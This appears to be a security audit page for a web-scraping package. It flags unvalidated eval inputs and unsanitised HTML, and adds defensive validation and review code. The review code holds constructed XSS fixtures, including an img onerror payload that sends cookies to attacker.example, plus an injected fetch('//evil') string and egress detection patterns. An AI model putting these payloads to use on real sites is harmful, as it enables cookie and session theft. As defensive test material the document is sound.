event-prospecting

Warn

Audited by Socket on Apr 27, 2026

2 alerts found:

Anomaly, Security, LOW
scripts/extract_event.mjs

This module is mainly a web-scraping/extraction CLI that writes scraped people/company data to local files. Within the provided code it shows no clear evidence of classic malware (credential theft, persistence, crypto-mining, or direct data exfiltration). It does, however, use a high-sensitivity pattern: it invokes an external 'browse' binary and passes a dynamically generated JavaScript payload to browse('eval', ...), while both the navigation target (recon.url) and the extraction behaviour (recon.nextDataPaths) are taken from recon.json without validation. If recon.json or recon.url can be influenced by an attacker, the risk rises materially: arbitrary target navigation combined with script evaluation in the page context. Separately, the resolveImage snippet appears truncated or malformed, suggesting a robustness issue.

Confidence: 58% / Severity: 58%
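The check this alert implies is missing, as an added example that is not code from the audited package: validate recon.json before it drives navigation or a page-context eval. The field names url and nextDataPaths are taken from the alert; the host allowlist, the property-path grammar and the readPath helper are assumptions of this example, and readPath is offered as a way to resolve extraction paths without interpolating recon values into JavaScript source.

```javascript
// Added example, not the package's own code. Field names url and nextDataPaths
// come from the Socket alert; the allowlist, PATH_RE and readPath are assumptions.

// A nextDataPath is a plain property path (dots and numeric indexes), never JS.
const PATH_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*|\[\d+\])*$/;
const RESERVED_SEGMENTS = new Set(["__proto__", "constructor", "prototype"]);

function pathSegments(path) {
  return path.replace(/\[(\d+)\]/g, ".$1").split(".");
}

function validateRecon(recon, allowedHosts) {
  const errors = [];
  if (typeof recon !== "object" || recon === null) {
    return { ok: false, errors: ["recon must be a JSON object"] };
  }

  // Navigation target: absolute http(s) URL, no embedded credentials,
  // hostname on the operator's allowlist.
  let url = null;
  try {
    url = new URL(String(recon.url));
  } catch {
    errors.push("url is not an absolute URL");
  }
  if (url) {
    if (url.protocol !== "https:" && url.protocol !== "http:") {
      errors.push(`url scheme ${url.protocol} not allowed`);
    }
    if (url.username || url.password) errors.push("url must not embed credentials");
    if (!allowedHosts.includes(url.hostname)) {
      errors.push(`host ${JSON.stringify(url.hostname)} not in allowlist`);
    }
  }

  // Extraction paths: reject anything that is not a bare property path.
  if (!Array.isArray(recon.nextDataPaths)) {
    errors.push("nextDataPaths must be an array");
  } else {
    for (const p of recon.nextDataPaths) {
      if (typeof p !== "string" || !PATH_RE.test(p) ||
          pathSegments(p).some(s => RESERVED_SEGMENTS.has(s))) {
        errors.push(`rejected nextDataPath ${JSON.stringify(p)}`);
      }
    }
  }
  return { ok: errors.length === 0, errors };
}

// Resolve a validated path against data already pulled out of the page,
// so extraction never needs recon-controlled text inside an eval payload.
function readPath(data, path) {
  return pathSegments(path).reduce(
    (cur, key) => (cur == null ? undefined : cur[key]), data);
}
```

The point of the path grammar is that a string such as `props.pageProps.speakers[0].name` is data, not code: once it passes the regex it can be looked up with readPath, and an input such as `x;fetch('//evil')` is rejected before anything reaches browse('eval', ...).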
Security, MEDIUM
scripts/compile_report.mjs

This module primarily performs static HTML/CSV generation, but it contains two high-impact client-side risk patterns: (1) it embeds markdown-rendered HTML directly into per-company pages with no explicit sanitization in the visible code, so whether the generated site is exposed to stored XSS depends entirely on the escaping behaviour of mdToHtml; and (2) it unconditionally injects clipboardScript into every generated page, which becomes a privacy/data-theft risk if that script reads clipboard contents or performs tracking or exfiltration. File writes and CSV generation are expected for this workflow. The optional execSync 'open' call is a secondary risk sink. Review and verify the sanitization behaviour of mdToHtml and the exact functionality of clipboardScript before using the generated site.

Confidence: 60% / Severity: 75%
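A concrete way to carry out the review the alert asks for, as an added example that is not code from the audited package: feed hostile markdown through the project's mdToHtml and inspect what survives, and statically triage the clipboardScript source for clipboard reads and egress. The renderer and script are passed in by the reviewer; the two stand-in renderers at the bottom and the hostile inputs are constructed fixtures, and the pattern lists are heuristics, not a proof of safety.

```javascript
// Added example, not the package's own code. mdToHtml and clipboardScript are
// supplied by whoever runs the review; everything below is constructed.

const DANGEROUS_MARKUP = [
  { id: "script-tag", re: /<script\b/i },
  { id: "inline-event-handler", re: /<[^>]*\son[a-z]+\s*=/i },
  { id: "javascript-url", re: /(?:href|src|action)\s*=\s*["']?\s*javascript:/i },
  { id: "active-embed", re: /<(?:svg|iframe|object|embed)\b/i },
];

// Constructed hostile markdown: what a scraped bio or description could carry.
const HOSTILE_MARKDOWN = [
  "<script>alert(document.cookie)</script>",
  "<img src=x onerror=\"fetch('//attacker.example/?c='+document.cookie)\">",
  "<a href=\"javascript:alert(1)\">click</a>",
  "<iframe src=\"//attacker.example\"></iframe>",
];

function scanHtml(html) {
  return DANGEROUS_MARKUP.filter(p => p.re.test(html)).map(p => p.id);
}

// Run every hostile input through the renderer and return the inputs whose
// output still contains active content. An empty array means nothing survived.
function probeRenderer(mdToHtml) {
  const hits = [];
  for (const md of HOSTILE_MARKDOWN) {
    const findings = scanHtml(mdToHtml(md));
    if (findings.length) hits.push({ input: md, findings });
  }
  return hits;
}

// Static triage of the injected script: does it read the clipboard or the
// paste event, and does it have any way to move data off the page?
const SCRIPT_SINKS = [
  { id: "clipboard-read", re: /navigator\.clipboard\.read(?:Text)?\s*\(/ },
  { id: "paste-listener", re: /addEventListener\s*\(\s*["']paste["']/ },
  { id: "clipboard-write", re: /navigator\.clipboard\.writeText\s*\(/ },
  { id: "network-egress", re: /\b(?:fetch|XMLHttpRequest|sendBeacon|WebSocket)\b/ },
  { id: "tracking-storage", re: /\b(?:localStorage|document\.cookie)\b/ },
];

function scanScript(src) {
  return SCRIPT_SINKS.filter(p => p.re.test(src)).map(p => p.id);
}

// Constructed stand-ins for the two outcomes the alert leaves open.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function passthroughMdToHtml(md) {            // unsafe: raw HTML reaches the page
  return `<p>${md}</p>`;
}

function escapingMdToHtml(md) {               // safe for these inputs
  return `<p>${md.replace(/[&<>"']/g, c => HTML_ESCAPES[c])}</p>`;
}
```

A clipboardScript that only calls navigator.clipboard.writeText (a copy-to-clipboard button) is a different finding from one that calls readText or registers a paste listener and then has a network sink; scanScript returns both categories so the reviewer can tell them apart before reading the source in full.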
Audit Metadata
Analyzed At
Apr 27, 2026, 03:05 PM
Package URL
pkg:socket/skills-sh/browserbase%2Fskills%2Fevent-prospecting%2F@7ed1a78b1748f1ac2d8b7294fdfa39b65c9296fe